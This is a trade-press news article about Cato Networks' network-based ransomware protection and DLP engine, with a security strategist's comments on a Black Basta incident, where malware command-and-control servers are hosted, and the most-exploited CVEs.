As secure access service edge (SASE) specialist Cato Networks burnishes its cyber credentials with the addition of multiple features to its platform, the company’s senior director of security strategy, Etay Maor, has urged users to challenge some of their preconceptions around security, using data drawn from Cato’s global network to counter some established cyber “truths”.
In June 2022, Cato became the first SASE supplier to add network-based ransomware protection to its platform, combining heuristic algorithms that scan server message block (SMB) protocol flows for attributes such as file properties and network or user behaviours, with the deep insights it already has into its network traffic from its day-to-day operations.
The algorithms were trained and tested against the firm’s existing data lake drawn from the Cato SASE Cloud – which holds over a trillion flows from Cato-connected edges.
The firm claims this will let it spot and stop the spread of ransomware across an organisation’s network by blocking SMB traffic to and from the source device to prevent lateral movement and file encryption.
Speaking to Computer Weekly, Maor, who joined Cato from IntSights, and is also an adjunct professor at the Woods College of Advancing Studies at Boston College, described a Black Basta ransomware attack to which he responded, in which the victim – an unnamed US organisation – could have benefited from this.
When he gained access to the victim’s security logs, Maor found that all the information that a ransomware attack was incoming was there, the security operations centre (SOC) team had just not been able to see it.
“I know it’s cool to get to sit in front of six screens, but what SOC analysts are trying to do is gather so much information and put it all together, so I understand why stuff is missed,” he said.
“In this case, it was remote desktop [RDP] to an Exchange server. Yes, they said, but that Exchange server doesn’t exist anymore so why attack a server that’s not there? So I had to introduce them to ransomware as a service [RaaS].
“What happened was someone else who attacked them sold their network data to someone else who wrote a script to automate the attack. They weren’t there for weeks, they were there for a minute, they didn’t know the victim had changed their Exchange server, but got lucky somewhere else.
“So if you can see east-west traffic, like an attempt to connect to a server that isn’t there, that should be a red flag to the SOC,” he explained. “We created our heuristic algorithms to look for these quirks.”
Maor said he wanted to explode the myth – favoured by presenters at security conferences – that attackers need to get lucky only once, while defenders need to get lucky all the time.
“When you look at MITRE ATT&CK and see how attackers operate, you soon see that saying is the opposite of the truth. Attackers have to be successful at phishing, gaining an endpoint, lateral movement, privilege escalation, downloading malware payloads, et cetera.
“You actually realise that attackers need to be right all the time, but defenders need to be right only at one point to protect, defend and mitigate,” he said.
Cato is now going further still, adding a data loss prevention (DLP) engine to protect data across all enterprise applications without needing to implement “complex and cumbersome” DLP rules. It forms part of Cato’s SSE 360 architecture and is designed to solve for what the firm describes as the limitations with which traditional DLP solutions are fraught.
For example, legacy DLP may have inaccurate rules that block legitimate activities – or, worse still, allow illegitimate ones – while a focus on public cloud applications is leaving sensitive data in proprietary or unsanctioned applications exposed.
Added to that, investment in legacy DLP solutions does not help provide protection from other threat vectors.
Cato believes it has these problems licked by introducing scanning across the network for sensitive files and data that is defined by the customer. It is capable of identifying more than 350 distinct data types, and once identified, customer-defined rules will block, alert or allow the transaction.
Threat visibility
Since joining Cato, Maor has been creating quarterly threat landscape reports using data drawn from the firm’s global network, and the latest edition of this report also challenges established cyber thinking in many ways.
For example, to spend a few days immersed in the security community, one might reasonably expect that most cyber attacks originate from within countries such as China or Russia, but Cato’s data reveal this is far from the case.
In fact, during the first three months of 2022, the most malicious activity was initiated from within the US, followed by China, Germany, the UK and Japan. Note this data is related to malware command and control (C2) communications, therefore the data reveals what countries host the most C2 servers.
Maor said that understanding where attacks really originate from should be a crucial part of a defender’s visibility into threats and trends. Attackers know full well that many organisations will add countries such as China or Russia to their deny lists or at the very least closely inspect traffic from those jurisdictions – therefore, he said, it makes perfect sense for them to base their C2 infrastructure in countries that organisations perceive as safer.
Cato’s report also pulled data on the most-abused cloud applications – Microsoft, Google, RingCentral, AWS and Facebook in that order – with Telegram, TikTok and YouTube also in vogue, likely as a result of the Russia-Ukraine war.
The report also showed the most targeted common vulnerabilities and exposures (CVEs) – predictably, Log4Shell was the runaway “winner” here, with more than 24 million exploit attempts seen in Cato’s telemetry, but in second place was CVE-2009-2445, a 13-year-old vulnerability in Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) that lets an attacker read arbitrary JSP files via an alternate data stream syntax.
“With such old vulnerabilities, people are completely unaware of them,” said Maor. “[It shows] the way defenders look at the network is completely different from how attackers do – defenders will send me a PDF visual file of their servers, DMZ, cloud, et cetera, [but] attackers will say, ‘Hey, you have a 14-year-old server, that’s interesting’.”